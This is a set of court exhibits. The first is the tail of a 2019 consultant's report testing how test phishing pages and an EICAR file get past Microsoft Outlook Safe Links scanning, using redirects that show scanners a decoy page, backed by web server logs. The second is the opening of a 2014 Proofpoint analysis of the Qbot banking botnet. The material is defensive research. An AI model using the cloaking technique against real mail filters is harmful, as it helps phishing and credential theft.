- The web server logs also show that the Microsoft Online Protection scanner connected to the web server 10 seconds after I had already been redirected to the original URL

```
88.98.209.138 - - [20/Aug/2019:22:14:39 +0000] "GET /facebook-2/ HTTP/1.1" 200 2191 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
88.98.209.138 - - [20/Aug/2019:22:14:39 +0000] "GET /facebook-2/grid.css HTTP/1.1" 200 1341 "http://safe-links.emtunc.org/facebook-2/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
88.98.209.138 - - [20/Aug/2019:22:14:39 +0000] "GET /facebook-2/main.css HTTP/1.1" 200 1724 "http://safe-links.emtunc.org/facebook-2/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
88.98.209.138 - - [20/Aug/2019:22:14:40 +0000] "GET /facebook-2/gasd34sad3.png HTTP/1.1" 304 180 "http://safe-links.emtunc.org/facebook-2/main.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
88.98.209.138 - - [20/Aug/2019:22:14:40 +0000] "GET /facebook-2/O7nsdhjdsXSI.png HTTP/1.1" 304 179 "http://safe-links.emtunc.org/facebook-2/main.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
40.107.199.89 - - [20/Aug/2019:22:14:50 +0000] "GET /facebook-2/ HTTP/1.1" 200 2191 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
40.107.199.89 - - [20/Aug/2019:22:14:50 +0000] "GET /facebook-2/grid.css HTTP/1.1" 200 1341 "http://safe-links.emtunc.org/facebook-2/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
40.107.199.27 - - [20/Aug/2019:22:14:50 +0000] "GET /facebook-2/main.css HTTP/1.1" 200 1724 "http://safe-links.emtunc.org/facebook-2/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
40.107.199.89 - - [20/Aug/2019:22:14:50 +0000] "GET /facebook-2/gasd34sad3.png HTTP/1.1" 200 3136 "http://safe-links.emtunc.org/facebook-2/main.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
40.107.199.89 - - [20/Aug/2019:22:14:50 +0000] "GET /facebook-2/O7nsdhjdsXSI.png HTTP/1.1" 200 377 "http://safe-links.emtunc.org/facebook-2/main.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
40.107.199.89 - - [20/Aug/2019:22:14:53 +0000] "GET /facebook-2/favicon.png HTTP/1.1" 200 667 "http://safe-links.emtunc.org/facebook-2/main.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
```

- However, when I tried to click on the URL within my Outlook.com email again (approximately 13 minutes later), I was shown the warning page below which indicates that the Safe Links feature was finally able to detect that this sub-domain (safe-links.emtunc.org) was serving unsafe content



Visiting this website might not be safe.

Outlook has blocked the link http://safe-links.emtunc.org/facebook... . This website might harm your computer or cause your personal information to be stolen. We recommend that you do not continue.



Continue anyway (not recommended) ›

- Upon clicking on a URL that Microsoft had marked as 'unsafe' - I noticed that I was still receiving connection requests from IP addresses belonging to Microsoft;

Case 0:20-cv-60416-XXXX   Document 3-1-23   Entered on FLSB Docket 02/26/2020   Page 347 of
726
Case 0:20-cv-60416-AMC   Document 1-23 Entered on FLSB Docket 02/26/2020 Page 10 of
726

The Bearded Man LTD - Mikail Tunç

presumably to re-scan the page and determine whether the content was still unsafe
or not

```
40.94.95.11 - - [20/Aug/2019:22:27:16 +0000] "GET /facebook-2/ HTTP/1.1" 200 2191 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133
Safari/537.36"
40.94.95.50 - - [20/Aug/2019:22:27:17 +0000] "GET /facebook-2/main.css HTTP/1.1" 200 1724 "http://safe-links.emtunc.org/facebook-2/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
40.94.95.11 - - [20/Aug/2019:22:27:17 +0000] "GET /facebook-2/grid.css HTTP/1.1" 200 1341 "http://safe-links.emtunc.org/facebook-2/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
40.94.95.50 - - [20/Aug/2019:22:27:17 +0000] "GET /facebook-2/O7nsdhjdsXSl.png HTTP/1.1" 200 377 "http://safe-links.emtunc.org/facebook-2/main.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
40.94.95.11 - - [20/Aug/2019:22:27:17 +0000] "GET /facebook-2/gasd34sad3.png HTTP/1.1" 200 3136 "http://safe-links.emtunc.org/facebook-2/main.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
40.94.95.24 - - [20/Aug/2019:22:27:20 +0000] "GET /facebook-2/favicon.png HTTP/1.1" 200 668 "http://safe-links.emtunc.org/facebook-2/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
```

# Tests - Bypass Techniques Implemented

*Note: The IP address **88.98.209.138** found in the web server access logs is my IP address. IP addresses other than the above belong to Microsoft Corporation; confirmed by querying publicly available whois data*

## Test 1: Google Phishing Page

- Original URL: http://safe-links-2.emtunc.org/google-1/
- Rewritten URL:
  https://eur03.safelinks.protection.outlook.com/?url=http%3A%2F%2Fsafe-links-2.emt unc.org%2Fgoogle-1%2F&data=02%7C01%7C%7C29604180b0524fd863c608d726 74150e%7C84df9e7fe9f640afb435aaaaaaaaaaaa%7C1%7C0%7C63702015231155 5057&sdata=oabn661bhIKu5wXyrAbnitKu93wEr4uGRrhNJ59YseY%3D&reserved=0
- I was taken directly to the phishing page - evidence of this can be seen in the web server access logs
- The web server logs show that the Microsoft Online Protection scanner connected to the web server 10 seconds after I had already been redirected to the original URL
- The web server logs also show the bypass technique working. You can see me (the victim of the phishing page) being sent to **/google-1** but the Microsoft scanner being redirected to **/totally-legitimate-domain/index.html**

```
88.98.209.138 - - [21/Aug/2019:20:14:16 +0000] "GET /google-1/ HTTP/1.1" 200 2266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
88.98.209.138 - - [21/Aug/2019:20:14:16 +0000] "GET /google-1/static/js/jquery.min.js HTTP/1.1" 200 29885 "http://safe-links-2.emtunc.org/google-1/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
88.98.209.138 - - [21/Aug/2019:20:14:16 +0000] "GET /google-1/static/img/dtnk16mcjo.png HTTP/1.1" 200 5561 "http://safe-links-2.emtunc.org/google-1/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
88.98.209.138 - - [21/Aug/2019:20:14:16 +0000] "GET /google-1/static/img/yqczrisvt2.png HTTP/1.1" 200 911 "http://safe-links-2.emtunc.org/google-1/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
88.98.209.138 - - [21/Aug/2019:20:14:16 +0000] "GET /google-1/static/css/style.css HTTP/1.1" 200 1180 "http://safe-links-2.emtunc.org/google-1/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
88.98.209.138 - - [21/Aug/2019:20:14:16 +0000] "GET /google-1/static/css/bootstrap.min.css HTTP/1.1" 200 20084 "http://safe-links-2.emtunc.org/google-1/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
88.98.209.138 - - [21/Aug/2019:20:14:17 +0000] "GET /google-1/static/img/tmjgvk28i.png HTTP/1.1" 200 4571 "http://safe-links-2.emtunc.org/google-1/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
88.98.209.138 - - [21/Aug/2019:20:14:17 +0000] "GET /google-1/static/img/oc3czvmbvf.png HTTP/1.1" 200 1616 "http://safe-links-2.emtunc.org/google-1/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
40.107.204.96 - - [21/Aug/2019:20:14:27 +0000] "GET /google-1/ HTTP/1.1" 302 632 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
40.107.204.96 - - [21/Aug/2019:20:14:27 +0000] "GET /totally-legitimate-domain/index.html HTTP/1.1" 302 631 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
```

## Test 2: Facebook Phishing Page

- Original URL: http://safe-links-2.emtunc.org/facebook-1
- Rewritten URL:
  https://nam11.safelinks.protection.outlook.com/?url=http%3A%2F%2Fsafe-links-2.em tunc.org%2Ffacebook-1&data=02%7C01%7C%7Ce9aff61362064f9d304608d72674 e5ad%7C84df9e7fe9f640afb435aaaaaaaaaaaa%7C1%7C0%7C6370201558198424 80&sdata=FGkKYpenuiuDmXeQqOn1xdeMublLdKAU4w8tTHlXg28%3D&reserved= 0
- I was taken directly to the phishing page - evidence of this can be seen in the web server access logs

- The web server logs show that the Microsoft Online Protection scanner connected to the web server 11 seconds after I had already been redirected to the original URL
- The web server logs also show the bypass technique working. You can see me (the victim of the phishing page) being sent to **/facebook-1** but the Microsoft scanner being redirected to **/totally-legitimate-domain/index.html**

```
88.98.209.138 - - [21/Aug/2019:20:19:47 +0000] "GET /facebook-1 HTTP/1.1" 301 618 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100
Safari/537.36"
88.98.209.138 - - [21/Aug/2019:20:19:47 +0000] "GET /facebook-1/ HTTP/1.1" 200 2627 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100
Safari/537.36"
88.98.209.138 - - [21/Aug/2019:20:19:47 +0000] "GET /facebook-1/static/css/normalize.min.css HTTP/1.1" 200 1302 "http://safe-links-2.emtunc.org/facebook-1/" "Mozilla/5.0 (Windows NT 10.0; Win64;
x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
88.98.209.138 - - [21/Aug/2019:20:19:47 +0000] "GET /facebook-1/static/js/jquery.min.js HTTP/1.1" 200 29885 "http://safe-links-2.emtunc.org/facebook-1/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
88.98.209.138 - - [21/Aug/2019:20:19:47 +0000] "GET /facebook-1/static/css/fonts.css HTTP/1.1" 200 558 "http://safe-links-2.emtunc.org/facebook-1/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
88.98.209.138 - - [21/Aug/2019:20:19:47 +0000] "GET /facebook-1/static/fonts/Lato-700.woff2 HTTP/1.1" 200 16654 "http://safe-links-2.emtunc.org/facebook-1/static/css/fonts.css" "Mozilla/5.0 (Windows
NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
88.98.209.138 - - [21/Aug/2019:20:19:47 +0000] "GET /facebook-1/static/fonts/Lato-regular.woff2 HTTP/1.1" 200 16698 "http://safe-links-2.emtunc.org/facebook-1/static/css/fonts.css" "Mozilla/5.0
(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
88.98.209.138 - - [21/Aug/2019:20:19:47 +0000] "GET /facebook-1/static/img/fmSarwc28y.png HTTP/1.1" 200 867 "http://safe-links-2.emtunc.org/facebook-1/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
40.107.246.98 - - [21/Aug/2019:20:19:58 +0000] "GET /facebook-1 HTTP/1.1" 301 618 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133
Safari/537.36"
40.107.246.98 - - [21/Aug/2019:20:19:59 +0000] "GET /facebook-1/ HTTP/1.1" 302 631 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133
Safari/537.36"
40.107.246.98 - - [21/Aug/2019:20:19:59 +0000] "GET /totally-legitimate-domain/index.html HTTP/1.1" 200 442 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/57.0.2987.133 Safari/537.36"
40.107.246.98 - - [21/Aug/2019:20:20:02 +0000] "GET /favicon.ico HTTP/1.1" 404 514 "http://safe-links-2.emtunc.org/totally-legitimate-domain/index.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
```

## Test 3 (no bypass techniques implemented): Eicar Anti-Malware Test File

- Original URL: http://safe-links-2.emtunc.org/eicar-2/eicar.com.txt
- Rewritten URL: https://nam02.safelinks.protection.outlook.com/?url=http%3A%2F%2Fsafe-links-2.emtunc.org%2Feicar-2%2Feicar.com.txt&data=02%7C01%7C7C%7C15d265e860e24c47f4b508d726752f3b%7C84df9e7fe9f640afb435aaaaaaaaaaaa%7C1%7C0%7C637020157050172837&sdata=RbCkAiPy3w1azEwSEtbOHmk%2FdvTTSi8rScmGgxgBJ0Q%3D&reserved=0
- I was taken directly to the malware test file/page - evidence of this can be seen in the web server access logs
- The web server logs show that the Microsoft Online Protection scanner connected to the web server 21 seconds after I had already been redirected to the original URL
- The web server logs also show the bypass technique working. You can see me (the victim of the malware page) being sent to **/eicar-2/eicar.com.txt** but the Microsoft scanner being redirected to **/totally-legitimate-domain/index.html**

```
88.98.209.138 - - [21/Aug/2019:20:23:15 +0000] "GET /eicar-2/eicar.com.txt HTTP/1.1" 200 352 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/76.0.3809.100 Safari/537.36"
40.90.216.147 - - [21/Aug/2019:20:23:36 +0000] "GET /eicar-2/eicar.com.txt HTTP/1.1" 302 632 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/57.0.2987.133 Safari/537.36"
40.90.216.147 - - [21/Aug/2019:20:23:36 +0000] "GET /totally-legitimate-domain/index.html HTTP/1.1" 200 442 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/57.0.2987.133 Safari/537.36"
40.90.216.147 - - [21/Aug/2019:20:23:40 +0000] "GET /favicon.ico HTTP/1.1" 404 514 "http://safe-links-2.emtunc.org/totally-legitimate-domain/index.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
```

## Test 4 (no bypass techniques implemented): A different Facebook Phishing Page

- Original URL: http://safe-links-2.emtunc.org/facebook-2
- Rewritten URL: https://nam03.safelinks.protection.outlook.com/?url=http%3A%2F%2Fsafe-links-2.em

tunc.org%2Ffacebook-2&data=02%7C01%7C%7C001ebcf272134507479808d72675
e566%7C84df9e7fe9f640afb435aaaaaaaaaaaa%7C1%7C0%7C6370201601084011
50&sdata=BWvbPmPVCsw%2Fs8q%2FaAdWR%2BmEo2alBYtW79f1J2VLbmg%3
D&reserved=0

- I was taken directly to the Facebook phishing page - evidence of this can be seen in the web server access logs
- The web server logs show that the Microsoft Online Protection scanner connected to the web server 11 seconds after I had already been redirected to the original URL
- The web server logs also show the bypass technique working. You can see me (the victim of the phishing page) being sent to **/facebook-2** but the Microsoft scanner being redirected to **/totally-legitimate-domain/index.html**

88.98.209.138 - - [21/Aug/2019:20:27:39 +0000] "GET /facebook-2 HTTP/1.1" 301 618 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
88.98.209.138 - - [21/Aug/2019:20:27:39 +0000] "GET /facebook-2/ HTTP/1.1" 200 2190 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
88.98.209.138 - - [21/Aug/2019:20:27:40 +0000] "GET /facebook-2/grid.css HTTP/1.1" 200 1341 "http://safe-links-2.emtunc.org/facebook-2/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
88.98.209.138 - - [21/Aug/2019:20:27:40 +0000] "GET /facebook-2/main.css HTTP/1.1" 200 1724 "http://safe-links-2.emtunc.org/facebook-2/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
88.98.209.138 - - [21/Aug/2019:20:27:40 +0000] "GET /facebook-2/O7nsdhjdsXSl.png HTTP/1.1" 200 377 "http://safe-links-2.emtunc.org/facebook-2/main.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
88.98.209.138 - - [21/Aug/2019:20:27:40 +0000] "GET /facebook-2/gasd34sad3.png HTTP/1.1" 200 3136 "http://safe-links-2.emtunc.org/facebook-2/main.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
88.98.209.138 - - [21/Aug/2019:20:27:40 +0000] "GET /facebook-2/favicon.png HTTP/1.1" 200 667 "http://safe-links-2.emtunc.org/facebook-2/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
13.66.202.166 - - [21/Aug/2019:20:27:50 +0000] "GET /facebook-2 HTTP/1.1" 301 618 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
13.66.202.166 - - [21/Aug/2019:20:27:51 +0000] "GET /facebook-2/ HTTP/1.1" 302 631 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
13.66.202.166 - - [21/Aug/2019:20:27:51 +0000] "GET /totally-legitimate-domain/index.html HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
40.94.227.27 - - [21/Aug/2019:20:27:52 +0000] "GET /facebook-2 HTTP/1.1" 301 618 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
40.94.227.27 - - [21/Aug/2019:20:27:53 +0000] "GET /facebook-2/ HTTP/1.1" 302 631 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
40.94.227.27 - - [21/Aug/2019:20:27:53 +0000] "GET /totally-legitimate-domain/index.html HTTP/1.1" 200 442 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
40.94.227.27 - - [21/Aug/2019:20:27:56 +0000] "GET /favicon.ico HTTP/1.1" 404 514 "http://safe-links-2.emtunc.org/totally-legitimate-domain/index.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"

- Interestingly, you can see two Microsoft IPs/scanners connecting to the webpage (13.66.202.166 and 40.94.227.27) - both with different user-agent headers. I could not find an explanation for this but this could potentially be a technique employed by Microsoft to send multiple scanners that *look different* in order to evade bypass techniques.
- The below is me trying 10 minutes later - the URL was still marked 'safe'

88.98.209.138 - - [21/Aug/2019:20:37:14 +0000] "GET /facebook-2/ HTTP/1.1" 200 2191 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"

- This below is me trying 27 minutes later - the URL was still marked 'safe' - notice the two Microsoft scanners again

88.98.209.138 - - [21/Aug/2019:20:54:16 +0000] "GET /facebook-2/ HTTP/1.1" 200 2191 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
13.66.202.166 - - [21/Aug/2019:20:54:26 +0000] "GET /facebook-2 HTTP/1.1" 301 618 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
13.66.202.166 - - [21/Aug/2019:20:54:26 +0000] "GET /facebook-2/ HTTP/1.1" 302 631 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
13.66.202.166 - - [21/Aug/2019:20:54:26 +0000] "GET /totally-legitimate-domain/index.html HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
40.94.227.80 - - [21/Aug/2019:20:54:29 +0000] "GET /facebook-2 HTTP/1.1" 301 618 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
40.94.227.80 - - [21/Aug/2019:20:54:29 +0000] "GET /facebook-2/ HTTP/1.1" 302 631 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
40.94.227.80 - - [21/Aug/2019:20:54:30 +0000] "GET /totally-legitimate-domain/index.html HTTP/1.1" 200 442 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
40.94.227.80 - - [21/Aug/2019:20:54:33 +0000] "GET /favicon.ico HTTP/1.1" 404 514 "http://safe-links-2.emtunc.org/totally-legitimate-domain/index.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"

- Finally, me trying the next day to confirm that the directory and sub-domain is still marked 'safe', therefore confirming that the bypass technique was successful

```
88.98.209.138 - - [22/Aug/2019:19:38:51 +0000] "GET /facebook-2/ HTTP/1.1" 200 2191 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100
Safari/537.36"
88.98.209.138 - - [22/Aug/2019:19:38:51 +0000] "GET /facebook-2/grid.css HTTP/1.1" 200 1341 "http://safe-links-2.emtunc.org/facebook-2/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
88.98.209.138 - - [22/Aug/2019:19:38:51 +0000] "GET /facebook-2/main.css HTTP/1.1" 200 1724 "http://safe-links-2.emtunc.org/facebook-2/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
88.98.209.138 - - [22/Aug/2019:19:38:51 +0000] "GET /facebook-2/O7nsdhjdsXSl.png HTTP/1.1" 304 179 "http://safe-links-2.emtunc.org/facebook-2/main.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
88.98.209.138 - - [22/Aug/2019:19:38:51 +0000] "GET /facebook-2/gasd34sad3.png HTTP/1.1" 304 180 "http://safe-links-2.emtunc.org/facebook-2/main.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
40.94.226.69 - - [22/Aug/2019:19:39:05 +0000] "GET /facebook-2 HTTP/1.1" 301 618 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133
Safari/537.36"
40.94.226.69 - - [22/Aug/2019:19:39:06 +0000] "GET /facebook-2/ HTTP/1.1" 302 631 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133
Safari/537.36"
40.94.226.69 - - [22/Aug/2019:19:39:06 +0000] "GET /totally-legitimate-domain/index.html HTTP/1.1" 200 442 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/57.0.2987.133 Safari/537.36"
40.94.226.69 - - [22/Aug/2019:19:39:09 +0000] "GET /favicon.ico HTTP/1.1" 404 514 "http://safe-links-2.emtunc.org/totally-legitimate-domain/index.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
```

Testing carried out between:

August 20 - 22, 2019


Report created on:

August 23, 2019


Testing performed by:

Mikail Tunç of The Bearded Man LTD; a London-based Cyber Security Consultancy

*Certified ISO/IEC 27001 Lead Auditor*

*GIAC Web Application Penetration Tester (GWAPT)*

*GIAC Certified Enterprise Defender (GCED)*

*MCSA: Windows Server 2012*

*650-153 - Cisco IronPort Security Associate - Email Security (ESFE)*

# EXHIBIT 22

Case 0:20-cv-60416-XXXX   Document 1-24   Entered on FLSD Docket 02/26/2020   Page 2 of 31



# Analysis of a Cybercrime Infrastructure

threat protection | compliance | archiving & governance | secure communication

**THREAT RESEARCH**

# Contents

Executive Summary ................................................................................3

Context: The Attack Chain ....................................................................4

Inside the Attack ...................................................................................6

    Who are the attackers? .....................................................................6

    Phase 1: Infecting Legitimate Web Sites .........................................6

    Phase 2: Filtering Targets – Traffic Distribution Systems...........10

    Phase 3: Getting Into the Users' Machines – Exploits................13

    Phase 4: Stealing User Banking Credentials – Malware ............17

    Phase 5: Infected PCs Used to Run Paid Proxying Service for Other Crime Groups ..................................................................................19

    Who were the victims?....................................................................22

Implications ........................................................................................23

    Financial Implications .....................................................................23

    End–user Perspective: Safeguarding PCs and Browsing ...........24

    Institutional Perspective: Safeguarding Banks ............................24

    Website Perspective: A Note on WordPress .................................24

APPENDIX................................................................................................25

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

THREAT RESEARCH

## Executive Summary

Proofpoint security researchers have published an analysis that exposes the inner workings of a cybercrime operation targeting online banking credentials for banks in the United States and Europe. This Proofpoint research report provides a detailed and rarely seen inside view of the infrastructure, tools and techniques that enabled this cybercrime group to infect over 500,000 PCs.

Key facts from the Proofpoint analysis:

- Russian-speaking cybercrime group targeted primarily US-based systems and online banking accounts.

- Qbot (aka Qakbot) botnet of 500,000 infected systems sniffed 'conversations' – including account credentials – for 800,000 online banking transactions, with 59% of the sniffed sessions representing accounts at five of the largest US banks.

- The attackers compromised WordPress sites using purchased lists of administrator logins, with which they were able to upload malware to legitimate sites in order to then infect clients that visited these sites. Many of these WordPress sites also run newsletters, which the attackers leverage to distribute legitimate but infected content.

- Windows XP clients comprised 52% of the infected systems in the cybercrime group's botnet, even though recent estimates place the Windows XP install base at 20–30% of business and consumer personal computers. Microsoft ended patch and update support for Windows XP in April 2014.

- The cybercrime group used compromised PCs to offer a sophisticated, paid proxying service for other organized crime groups. The service turns infected PCs into an illicit 'private cloud' as well as infiltration points into corporate networks.

